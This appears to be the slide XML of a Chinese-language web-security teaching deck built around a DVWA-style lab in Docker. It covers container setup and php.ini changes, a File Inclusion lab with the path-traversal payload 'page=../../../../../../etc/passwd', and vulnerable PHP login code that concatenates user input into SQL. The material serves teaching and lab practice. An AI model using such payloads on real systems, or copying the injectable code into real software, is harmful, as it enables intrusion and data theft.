            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="21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7" name="矩形 16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9BE99220-AB60-4FEA-88F4-FB8B6EA1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8" y="4523930"/>
            <a:ext cx="3036094" cy="3071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383493-5B62-45E9-BFD2-0C1D4F2CDA61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615580" y="401975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進入容器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486068F-0871-49F4-9165-9B9339D2A9B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029536" y="3957056"/>
            <a:ext cx="3160532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docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exec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002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>容器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash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73043" y="228424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找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>php.ini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2178919" y="2238079"/>
            <a:ext cx="2359140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find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php.ini</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4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648266B-0BE2-4592-85AB-62A35680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28963"/>
            <a:ext cx="3043238" cy="77866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73043" y="2956434"/>
            <a:ext cx="1921571" cy="172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708B25F-4A38-4CCD-A168-57C354F5C000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73043" y="228424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找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>php.ini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2178919" y="2238079"/>
            <a:ext cx="2359140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find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php.ini</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4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648266B-0BE2-4592-85AB-62A35680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28963"/>
            <a:ext cx="3043238" cy="77866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73043" y="2956434"/>
            <a:ext cx="1921571" cy="172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708B25F-4A38-4CCD-A168-57C354F5C000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5383493-5B62-45E9-BFD2-0C1D4F2CDA61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615580" y="41332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安裝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vim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486068F-0871-49F4-9165-9B9339D2A9B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029536" y="4070535"/>
            <a:ext cx="1784470" cy="73866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apt-get update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617DE466-39BF-451C-B412-25D60F72070E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466599" y="4044619"/>
            <a:ext cx="2126597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apt-get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>install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FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vim</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="箭號: 向右 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5934E043-188D-49B7-8213-7B0378F21C26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3907799" y="4070535"/>
            <a:ext cx="491067" cy="382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421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81713" y="228424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修改設定檔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2187588" y="2238079"/>
            <a:ext cx="3993079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altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc/php/7.0/apache2/php.ini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2FEE370-426B-48F1-8441-8934D8E0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97718"/>
            <a:ext cx="5300663" cy="6715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53465" y="2822525"/>
            <a:ext cx="1921571" cy="646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1D17B388-60DF-480E-8E30-141A038B02A6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3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54DFE30-477D-4C0D-A74F-3CF47E13A0DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581713" y="228424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修改設定檔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9719426-BDD8-44BB-90EA-EF61D6CB0F1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2187588" y="2238079"/>
            <a:ext cx="3993079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altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc/php/7.0/apache2/php.ini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02FEE370-426B-48F1-8441-8934D8E0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0" y="2797718"/>
            <a:ext cx="5300663" cy="6715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BB8339F-ECDE-438A-B6D3-FEBDB9210BBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553465" y="2822525"/>
            <a:ext cx="1921571" cy="646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1D17B388-60DF-480E-8E30-141A038B02A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2700886" y="1312378"/>
            <a:ext cx="4946162" cy="5539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2100" dirty="0" err="1"/>
              <a:t>allow_url_include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>解決方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A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5383493-5B62-45E9-BFD2-0C1D4F2CDA61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615580" y="420745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6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>重新啟動</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>apache2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486068F-0871-49F4-9165-9B9339D2A9B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2789302" y="4154581"/>
            <a:ext cx="2785022" cy="4154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>
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>service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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apache2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>restart</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="箭號: 向右 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{F657A4E5-0787-4752-B7DE-03615761AB3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5718402" y="4141018"/>
            <a:ext cx="509628" cy="392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5E86DD92-0576-44B5-8C68-49EDC279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58" y="3651368"/>
            <a:ext cx="1894070" cy="1340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0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1D5B4129-F6B9-4CD3-BF52-A6E22F5D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4" y="2663245"/>
            <a:ext cx="4164806" cy="21645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707913" y="2149383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C474F31-2AF2-47E7-8BDB-5530139B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67" y="2406620"/>
            <a:ext cx="4493419" cy="2836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288AB3B-7C00-4F89-A278-9F1CCFADE6A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4508244" y="2646468"/>
            <a:ext cx="1332790" cy="198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B2926AC4-9402-4F36-A57A-7F046D11D156}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3094441" y="1950007"/>
            <a:ext cx="49600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發現按下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file 1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file 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>網址列就出現類似的東西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1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3690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E26C36C7-54BA-4ADA-B7A1-5D3CC45EE47D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389805" y="1656362"/>
            <a:ext cx="19106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攻擊測試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DD8183E-CCED-410D-9D00-D080B58D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10" y="2866917"/>
            <a:ext cx="5664994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288AB3B-7C00-4F89-A278-9F1CCFADE6A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4475344" y="3123500"/>
            <a:ext cx="1332790" cy="198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2AF75E-9004-400C-A40E-7ED4338AA469}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277140" y="3492577"/>
            <a:ext cx="2515432" cy="553998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3000" dirty="0"/>
              <a:t>page=file4.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3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7B737E96-5877-4A5F-A10D-9B9BEFEC7651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5300502" y="2377234"/>
            <a:ext cx="3332964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試試看網頁上沒有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="21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6" name="矩形 15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0530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3" y="1513984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C131329B-0762-4E9E-AD3F-3771394F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21" y="2603289"/>
            <a:ext cx="2682403" cy="27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353263" y="5119199"/>
            <a:ext cx="45300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708599" y="4429494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1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0530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2276600" y="2295228"/>
            <a:ext cx="34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600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>﻿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The page we wish to display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$file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'page'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10800000">
            <a:off x="4870640" y="3429001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5541278" y="3498250"/>
            <a:ext cx="1146468" cy="3231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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用者輸入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2" name="矩形 11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2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056379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F3956C1-6CB6-4562-A10B-C20901EF496E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1720450" y="1300959"/>
            <a:ext cx="29005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https://zh.wikipedia.org/zh-tw/Docker</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="135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551A786-5459-4E74-ACB0-9BD4B131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" y="2055129"/>
            <a:ext cx="2851549" cy="28515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A2A2D55-D488-4F7B-A0FB-9F264B34C54A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1720451" y="1554353"/>
            <a:ext cx="38289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https://www.docker.com/resources/what-container</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="13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E9D9F81-AE2C-4A23-A0F3-4A410B806BD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3019794" y="2110376"/>
            <a:ext cx="6068125" cy="27905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Docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>屬於輕量級虛擬化技術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作業系統層虛擬化（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Operating System–Level Virtualization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="214313" indent="-214313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Docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將應用程式建立於容器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Container)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中，可使應用程式執行的更快速。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="214313" indent="-214313">
              <a:spcBef>
                <a:spcPts val="75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3" name="矩形 12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1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80530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2276600" y="2295228"/>
            <a:ext cx="34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600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>﻿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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>// The page we wish to display </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="zh-TW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$file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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>'page' </a:t>
            </a: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560359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xmlns="" id="{075D1907-B694-4401-83C3-2B293FCFFC91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="13504873">
            <a:off x="3606019" y="3788768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6AD660C5-192E-4C5F-B57F-9DC176A808EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4219662" y="3944068"/>
            <a:ext cx="4608954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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>發現沒有對輸入做任何檢查，直接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1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存取目錄下的檔案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5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63953" y="201848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2AF75E-9004-400C-A40E-7ED4338AA469}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2092347" y="4726428"/>
            <a:ext cx="4976362" cy="553998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3000" dirty="0"/>
              <a:t>page=../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/passwd</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3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E26C36C7-54BA-4ADA-B7A1-5D3CC45EE47D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3372221" y="1921122"/>
            <a:ext cx="19106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攻擊手法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AC68911-6599-41FD-AB96-BFF5FED0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29" y="2754357"/>
            <a:ext cx="5972175" cy="187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288AB3B-7C00-4F89-A278-9F1CCFADE6A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4616523" y="3012660"/>
            <a:ext cx="1332790" cy="198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3454B3-32F8-4D90-9047-FF77A03C8F60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5282918" y="1796728"/>
            <a:ext cx="2723823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r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>回到上一層</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>因為不知道目前在哪一層</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>所以使用多個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../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32A2CBC-8476-40B8-9A1F-57AAA48159A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615580" y="1335063"/>
            <a:ext cx="180530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File Inclusion</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW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6" name="矩形 15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4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xmlns="" id="{8E2718B5-B9D7-467F-A956-FD21AECB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698" y="2991756"/>
            <a:ext cx="6712606" cy="557263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5591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85D3B3A-59A4-4421-8FBC-24A9683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5" y="2532022"/>
            <a:ext cx="2980817" cy="218889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0" name="矩形 9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875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81537" y="1753729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5D025A1F-4538-45BE-9C0E-4587066E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95" y="2747901"/>
            <a:ext cx="2919810" cy="234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708ECD6F-C8B1-470B-95CD-BC05542ED90F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4009322" y="1490596"/>
            <a:ext cx="19106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測試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684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13803" y="1513984"/>
            <a:ext cx="233818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查看原始碼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D8C5026-BDB5-4493-B85F-5B48561A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62" y="2738966"/>
            <a:ext cx="2703071" cy="2698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CDAE58-E774-409D-849E-5CC3988AF260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5396015" y="5267459"/>
            <a:ext cx="453006" cy="201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C30F426F-3862-4CBF-84B3-BB1DDDB41C6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3197583">
            <a:off x="4751351" y="4577753"/>
            <a:ext cx="1024467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1" name="群組 10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2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152526" y="1722822"/>
            <a:ext cx="74797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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>﻿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9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'Login'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username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'username'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password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'password'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md5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Check the database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"SELECT * FROM `users` WHERE user = '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 AND password = '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if(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&amp;&amp;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mysqli_num_rows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==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1 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users details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$row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mysqli_fetch_assoc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$avatar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"avatar"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Login successful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"&lt;p&gt;Welcome to the password protected area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&lt;/p&gt;"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"&lt;img src=\"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$avatar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\" /&gt;"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Login failed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"&lt;pre&gt;&lt;br /&gt;Username and/or password incorrect.&lt;/pre&gt;"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is_null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mysqli_close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false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16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25736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xmlns="" id="{62C8B2E7-4BA5-49E6-AC1A-D115D2CE6B5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8957309">
            <a:off x="2633636" y="2044542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5999300-2E6A-4FDB-8C4F-D81A62B29EC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3245272" y="2198519"/>
            <a:ext cx="133882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使用者輸入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xmlns="" id="{CB297D44-81A2-40A1-AA0B-C96954BAB241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9251375">
            <a:off x="2656125" y="2443657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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="群組 16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21" name="矩形 2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978DB4B-5ABE-4BCE-8855-7F71D6F802ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152526" y="1722822"/>
            <a:ext cx="74797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600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>﻿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&lt;?php </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000BB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if( isset(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'Login'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 ) )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username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'username'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password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$_GET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'password'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md5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Check the database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"SELECT * FROM `users` WHERE user = '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 AND password = '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$pass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mysqli_query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],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$query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or die(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'&lt;pre&gt;'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.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is_object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mysqli_error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 :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mysqli_connect_error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false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)) .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'&lt;/pre&gt;'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if(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&amp;&amp;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mysqli_num_rows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==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1 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Get users details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$row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mysqli_fetch_assoc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$result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$avatar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$row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"avatar"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Login successful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"&lt;p&gt;Welcome to the password protected area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$user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&lt;/p&gt;"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"&lt;img src=\"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{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$avatar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\" /&gt;"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else {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// Login failed </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF80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FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>       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echo 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"&lt;pre&gt;&lt;br /&gt;Username and/or password incorrect.&lt;/pre&gt;"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/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    ((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is_null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mysqli_close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(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$GLOBALS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zh-TW" altLang="zh-TW" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>"___mysqli_ston"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]))) ?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false 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: </a:t>
            </a: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$___mysqli_res</a:t>
            </a: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);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7700"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>?&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" sz="1600" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="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xmlns="" id="{90CA7A2F-84EB-4E21-A008-48E8B7506D9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840183" y="1225736"/>
            <a:ext cx="14636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原始碼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xmlns="" id="{C9456BCF-D0F9-45E3-BF53-421172172AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
